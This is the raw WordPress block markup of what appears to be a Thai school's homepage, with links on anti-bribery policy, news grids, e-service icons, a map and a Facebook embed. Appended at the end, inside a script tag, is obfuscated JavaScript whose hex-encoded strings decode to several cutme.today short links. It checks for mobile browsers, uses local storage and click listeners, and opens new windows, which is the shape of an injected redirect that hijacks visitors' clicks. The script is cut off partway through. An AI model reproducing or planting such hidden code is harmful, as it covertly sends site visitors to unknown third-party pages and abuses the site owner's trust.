{\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'